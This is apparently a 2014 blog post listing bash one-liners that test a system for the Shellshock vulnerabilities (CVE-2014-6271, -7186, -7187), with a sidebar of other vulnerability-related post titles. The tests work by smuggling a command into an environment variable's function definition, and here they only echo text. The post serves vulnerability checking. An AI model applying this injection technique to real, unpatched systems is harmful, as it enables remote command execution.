shellshock test
vulnerability 2014. 10. 1. 15:01 |rpm -qa|grep bash
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
env x='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
foo='() { echo not patched; }' bash -c foo
case open
'vulnerability' 카테고리의 다른 글
| 보안필터 우회 종류 (0) | 2013.05.22 |
|---|---|
| 00410041 exploit (0) | 2013.05.09 |
| web browser bug hunting (0) | 2013.02.27 |
| hwp & javascript (0) | 2012.10.16 |
| GOM Player 2.1.33.5071 exploit (0) | 2011.12.09 |